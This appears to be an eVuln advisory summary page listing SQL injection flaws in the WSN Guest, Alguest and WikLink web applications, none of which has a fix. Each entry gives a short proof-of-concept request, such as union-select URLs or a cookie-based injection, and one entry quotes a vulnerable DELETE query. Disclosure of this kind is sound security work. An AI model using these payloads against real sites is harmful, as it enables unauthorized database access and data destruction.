Recent SQL Injection vulnerabilities

Here is short summary of recent SQL Injection vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.

time SQL Injection vulnerability in WSN Guest.

Description.

It is possible to inject SQL expression using time parameter in the memberlist.php script.

Parameter time is used in SQL query without proper sanitation.

Exploit.

SQL Injection PoC:

http://website/wsnguest/memberlist.php? field=time%27&ascdesc=asc&perpage=25&debug=1

SQL expression injection is possible after ORDER BY.

Solution

Solution is not available.

Other details >>

wsnuser Cookie SQL Injection vulnerability in WSN Guest.

Description.

It is possible to inject arbitrary SQL query using wsnuser cookie parameter in the index.php script.

Parameter wsnuser is used in SQL query without proper sanitation.

Exploit.

Cookie SQL Injection PoC. HTTP query:
GET /wsnguest/index.php?debug=1 HTTP/1.0
Host: website
Cookie: wsnuser=[SQL Injection]

Solution

Solution is not available.

Other details >>

elimina SQL Injection vulnerability in Alguest.

Description.

It is possible to inject arbitrary SQL query using elimina parameter in elimina.php script.

Parameter elimina is used in SQL query without any sanitation.

Exploit.

Vulnerable code: $query = "DELETE FROM guest WHERE id=$elimina";

SQL Injection PoC:
POST /alguest/elimina.php HTTP/1.0
Host: website
Cookie: admin=1
Content-Length: N

send=elimina&elimina=[SQL Injection]

Solution

Solution is not available.

Other details >>

fold and site SQL Injections in WikLink.

Description.

It is possible to inject arbitrary SQL query using fold and site parameters in editCategory.php and editSite.php scripts.

Parameters fold and site are used in SQL query without any sanitation.

Condition: magic_quotes: off

Exploit.

SQL Injection example1:
http://website/wiklink/editCategory.php?action=edit&fold=9999'%20union%20select%201,2,3,4/*

SQL Injection example2:
http://website/wiklink/editSite.php?action=edit&site=999'%20union%20select%201,2,3,4,5/*

Solution

Solution is not available.

Other details >>

id SQL Injection in WikLink.

Description.

It is possible to inject arbitrary SQL query using id parameter in getURL.php script.

Parameter id used in SQL query without any sanitation.

Condition: magic_quotes: off

Exploit.

SQL Injection example: http://website/wiklink/getURL.php?id=-1' union select 1111/*

Solution

Solution is not available.

Other details >>
Advisories by vuln type

Website Monitoring

Daily malware scanning. Allows to receive alerts about security problems in your website.
Details >>

Malicious redirects detected?

eVuln team will eliminate the reason, clean your website and monitor it.
Details >>

Website blacklisted?

eVuln team will clean your website, discover and fix security holes, remove from blacklists.
Details >>